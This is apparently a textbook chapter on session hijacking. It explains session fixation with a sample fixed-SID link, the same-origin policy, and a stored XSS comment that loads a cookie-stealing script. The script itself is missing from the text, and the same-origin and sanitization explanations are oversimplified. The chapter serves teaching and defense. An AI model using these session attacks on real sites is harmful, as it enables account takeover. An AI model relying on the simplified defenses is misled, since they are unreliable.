
How the Internet Works, Chapter 16
The Application Layer: Session Hijacking and Ways to Prevent It


Session Hijacking

There are many ways to compromise session security. Here, we’ll take a closer look at session hijacking and some ways to make it more difficult.

Session hijacking refers to a malicious user gaining unauthorized access to a user’s SID, and using that SID to impersonate the user in a session.

There are many sophisticated ways to hijack sessions, in particular various uses of packet sniffing. But one of the simpler ways is to send a user an email containing a link to a site on which the user might have an account. The link carries a query parameter with a session ID chosen by the attacker, e.g. http://mybank.com?SID=some_known_value. If the recipient is tricked into logging in through that link, the attacker has access to the session as well, since the server kept the SID the link supplied. This is called a session fixation attack.

Same-Origin Policy

A first-line defense against session hijacking is the same-origin policy. A page’s origin is a combination of its URL’s scheme, host name, and port number. The same-origin policy states that scripts contained in a web page may access data in another web page only if both web pages have the same origin. For example, suppose a user logs into a banking application. Suppose further that the user then navigates to a malicious page in another browser tab, and sends a request to that page’s server (clicks a link, for example). In this case, the request wouldn’t originate on the banking server, so same-origin policy would disallow the request.

Cross-Site Scripting

Cross-site scripting, or XSS, is another form of session hijacking. Cross-site scripting circumvents the same-origin policy because the page the server sent to the browser is the very page that sends the request for the authorization cookies: the injected script runs with the site's own origin.

For example, a malicious user could enter this comment into a blog site:

That comment permanently embeds the script in the page, and all that is visibly displayed is “What a great idea!”. This means that anyone who loads the page also executes stealauth.js, a JavaScript program that sends the SID of whoever loaded the page to the malicious user, who can then use that SID to impersonate the legitimate user on the site.

Sanitization

Sanitization of user input is the usual way to combat cross-site scripting attacks. One common sanitization technique is to disallow <script> tags in comments. Doing this would prevent the malicious posting in the above example.